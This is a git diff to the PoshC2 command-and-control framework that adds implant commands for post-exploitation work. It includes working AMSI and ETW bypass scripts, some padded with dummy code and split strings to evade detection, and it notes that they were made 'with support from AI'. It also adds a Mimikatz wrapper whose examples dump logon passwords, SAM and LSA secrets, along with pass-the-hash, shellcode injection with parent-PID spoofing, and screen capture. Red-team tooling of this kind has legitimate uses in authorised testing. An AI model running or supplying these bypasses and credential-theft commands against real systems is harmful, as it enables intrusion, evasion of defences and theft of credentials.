nettitude · benpturner · Sep 2, 2024 · Jul 16, 2024 · Jul 16, 2024 · Jul 16, 2024
diff --git a/poshc2/client/Alias.py b/poshc2/client/Alias.py
@@ -99,4 +99,5 @@
 ]
 
 um_replace = [
+    ["sharpps", "run-exe Program PS"],
 ]
diff --git a/poshc2/client/command_handlers/ImplantHandler.py b/poshc2/client/command_handlers/ImplantHandler.py
diff --git a/poshc2/client/command_handlers/PSHandler.py b/poshc2/client/command_handlers/PSHandler.py
@@ -106,6 +106,216 @@ def get_commands():
     return commands.keys()
 
 
+@command(commands, commands_help, examples, block_help)
+def do_disable_amsi_1(user, command, implant_id):
+    """
+    Disables / wipes the amsiContext
+
+    ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass
+
+    Examples:
+        disable-amsi-1
+    """
+
+    command = """
+$a = [Ref].Assembly.GetTypes()
+ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
+$d = $c.GetFields('NonPublic,Static')
+ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
+$g = $f.GetValue($null)
+[IntPtr]$ptr = $g
+[Int32[]]$buf = @(0)
+[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+"""
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
+@command(commands, commands_help, examples, block_help)
+def do_disable_amsi_2(user, command, implant_id):
+    """
+    Disables / wipes the amsiContext
+
+    ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass
+
+    With support from AI
+
+    Examples:
+        disable-amsi-2
+    """
+
+    command = """
+# Dummy function to simulate some unrelated logic
+function Test-DummyFunction {
+    Write-Output "Starting dummy function..."
+    $x = 10
+    $y = 20
+    $z = $x + $y
+    Write-Output "The sum of $x and $y is $z"
+}
+
+# Another dummy function
+function Another-DummyFunction {
+    Write-Output "Running another dummy function..."
+    $a = "Hello"
+    $b = "World"
+    $c = "$a, $b!"
+    Write-Output $c
+}
+
+# Main script begins
+Write-Output "Initializing the main script..."
+Test-DummyFunction
+Another-DummyFunction
+
+# Reflective assembly analysis
+$a = [Ref].Assembly.GetTypes()
+ForEach($b in $a) {
+    if ($b.Name -like "*iUtils") {
+        $c = $b
+        Write-Output "Found matching type: $($b.Name)"
+    }
+}
+
+# Retrieve specific fields
+$d = $c.GetFields('NonPublic,Static')
+ForEach($e in $d) {
+    if ($e.Name -like "*Context") {
+        $f = $e
+        Write-Output "Found matching field: $($e.Name)"
+    }
+}
+
+# Manipulate field value
+$g = $f.GetValue($null)
+[IntPtr]$ptr = $g
+[Int32[]]$buf = @(0)
+Write-Output "Preparing to copy buffer to memory..."
+[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+Write-Output "Buffer copied to memory."
+
+# Additional dummy logic
+function Final-DummyFunction {
+    Write-Output "Executing final dummy function..."
+    $numbers = 1..5
+    foreach ($num in $numbers) {
+        Write-Output "Number: $num"
+    }
+}
+
+# Main script ends
+Final-DummyFunction
+Write-Output "Script execution completed."
+"""
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
+
+@command(commands, commands_help, examples, block_help)
+def do_disable_etw_1(user, command, implant_id):
+    """
+    Disables the PSEtwLogProvider
+
+    ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/etw-block
+    ref: https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
+
+    Examples:
+        disable-etw-1
+    """
+
+    command = """
+[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
+"""
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
+@command(commands, commands_help, examples, block_help)
+def do_disable_etw_2(user, command, implant_id):
+    """
+    Disables the PSEtwLogProvider
+
+    ref: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/etw-block
+    ref: https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
+
+    With support from AI
+
+    Examples:
+        disable-etw-2
+    """
+
+    command = """
+# Bloat: Adding unnecessary variables and functions
+function Get-ObfuscationLevel {
+    param (
+        [int]$level = 1
+    )
+    return $level * 2
+}
+
+$dummyVar1 = "Lorem ipsum dolor sit amet"
+$dummyVar2 = "consectetur adipiscing elit"
+$dummyVar3 = "sed do eiusmod tempor incididunt ut labore et dolore magna aliqua"
+
+# Obfuscated and bloated main code
+function Invoke-MainFunction {
+    # More bloat: Unnecessary loops and conditions
+    for ($i = 0; $i -lt (Get-ObfuscationLevel 3); $i++) {
+        if ($i % 2 -eq 0) {
+            [void]($dummyVar1 -match $dummyVar2)
+        } else {
+            [void]($dummyVar3 -match $dummyVar1)
+        }
+    }
+
+    # Actual obfuscated code
+    $assemblyLoad = 'L' + 'oadWithPartialName'
+    $typeGet = 'Get' + 'Type'
+    $fieldGet = 'Get' + 'Field'
+    $setValue = 'Set' + 'Value'
+    $nonPublicInstance = 'Non' + 'Public,' + 'Instance'
+    $nonPublicStatic = 'Non' + 'Public,' + 'Static'
+
+    [Reflection.Assembly]::$assemblyLoad('System.Core').$typeGet('System.Diagnostics.Eventing.EventProvider').$fieldGet('m_enabled', $nonPublicInstance).$setValue(
+        [Ref].Assembly.$typeGet('System.Management.Automation.Tracing.PSEtwLogProvider').$fieldGet('etwProvider', $nonPublicStatic).GetValue($null),
+        0
+    )
+}
+
+Invoke-MainFunction
+"""
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
 @command(commands, commands_help, examples, block_help)
 def do_install_servicelevel_persistence(user, command, implant_id):
     """
@@ -182,6 +392,23 @@ def do_get_implant_working_directory(user, command, implant_id):
     insert_object(new_task)
 
 
+@command(commands, commands_help, examples, block_help, name="pwd")
+def do_download_file(user, command, implant_id):
+    """
+    Downloads a file over the C2.
+
+    Examples:
+        download-file c:\\temp\\file.exe
+    """
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
 @command(commands, commands_help, examples, block_help)
 def do_get_system(user, command, implant_id):
     """
@@ -441,6 +668,36 @@ def do_invoke_wmi_payload(user, command, implant_id):
         return
 
 
+@command(commands, commands_help, examples, block_help, name="invoke-mimikatz")
+def do_invoke_mimikatz(user, command, implant_id):
+    """
+    Uses Invoke-Mimikatz to run mimikatz on the target
+
+    https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
+
+    Requires privileged on the target to run the command and will store the output in the DB
+
+    Examples:
+        invoke-mimikatz -command '"sekurlsa::logonpasswords"'
+        invoke-mimikatz -command '"privilege::debug" "lsadump::sam"'
+        invoke-mimikatz -command '"privilege::debug" "lsadump::lsa"'
+        invoke-mimikatz -command '"privilege::debug" "lsadump::cache"'
+        invoke-mimikatz -command '"privilege::debug" "lsadump::secrets"'
+        invoke-mimikatz -command '"ts::multirdp"'
+        invoke-mimikatz -command '"privilege::debug"'
+        invoke-mimikatz -command '"crypto::capi"'
+        invoke-mimikatz -command '"crypto::certificates /export"'
+        invoke-mimikatz -command '"sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<hash> /run:c:\\temp\\run.bat"'
+    """
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
 @command(commands, commands_help, examples, block_help)
 def do_invoke_dcom_payload(user, command, implant_id):
     """
@@ -800,6 +1057,61 @@ def do_inject_shellcode(user, command, implant_id):
         print_bad(f"Error loading file: {e}")
 
 
+@command(commands, commands_help, examples, block_help)
+def do_invoke_shellcode(user, command, implant_id):
+    """
+    Invoke shellcode into a target process, obtaining an implant in that process.
+
+    Prompts for the shellcode file to use.
+    Can either provide an executable to run and an optional parent PID to spoof,
+    or the PID of an already running process.
+
+    New processes can be created suspended to prevent execution if desired.
+
+    Examples:
+        invoke-shellcode -processid 5634
+    """
+    params = re.compile("invoke-shellcode", re.IGNORECASE)
+    params = params.sub("", command)
+    check_module_loaded("Invoke-Shellcode.ps1", implant_id, user)
+    session = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.shellcode-history'),
+                            auto_suggest=AutoSuggestFromHistory(), style=style)
+
+    try:
+        path = session.prompt("Location of shellcode file: ",
+                              completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
+        path = PayloadsDirectory + path
+    except KeyboardInterrupt:
+        return
+
+    try:
+        shellcodefile = load_file(path)
+
+        if shellcodefile is not None:
+            arch = "64"
+            gzip_shellcode = gzipdata(shellcodefile)
+            cmd = f"$Shellcode{arch}=\"{gzip_shellcode}\" #{os.path.basename(path)}"
+            new_task = NewTask(
+                implant_id=implant_id,
+                command=cmd,
+                user=user,
+                child_implant_id=None
+            )
+
+            insert_object(new_task)
+            cmd = f"Invoke-Shellcode -Force -Shellcode (gzip-decompress($Shellcode{arch})){params}"
+            new_task = NewTask(
+                implant_id=implant_id,
+                command=cmd,
+                user=user,
+                child_implant_id=None
+            )
+
+            insert_object(new_task)
+    except Exception as e:
+        print_bad(f"Error loading file: {e}")
+
+
 @command(commands, commands_help, examples, block_help)
 def do_ps(user, command, implant_id):
     """
@@ -970,7 +1282,7 @@ def do_get_multi_screenshot(user, command, implant_id):
     Gets multiple screenshots over a defined period, one screenshot per beacon.
 
     Examples:
-        get-multi-screenshot 2m
+        get-multi-screenshot -timedelay 10 -quantity 30
     """
     pwrStatus = get_power_status(implant_id)
 
@@ -1008,6 +1320,32 @@ def do_stop_multi_screenshot(user, command, implant_id):
     insert_object(new_task)
 
 
+@command(commands, commands_help, examples, block_help)
+def do_get_screenshot_allwindows(user, command, implant_id):
+    """
+    Gets a screenshot of all windows on the the current desktop.
+
+    Examples:
+        get-screenshot-allwindows
+    """
+    pwrStatus = get_power_status(implant_id)
+
+    if pwrStatus is not None and pwrStatus.screen_locked:
+        ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
+
+        if ri.lower() == "n" or ri.lower() == "":
+            return
+
+    new_task = NewTask(
+        implant_id=implant_id,
+        command=command,
+        user=user,
+        child_implant_id=None
+    )
+
+    insert_object(new_task)
+
+
 @command(commands, commands_help, examples, block_help)
 def do_get_screenshot(user, command, implant_id):
     """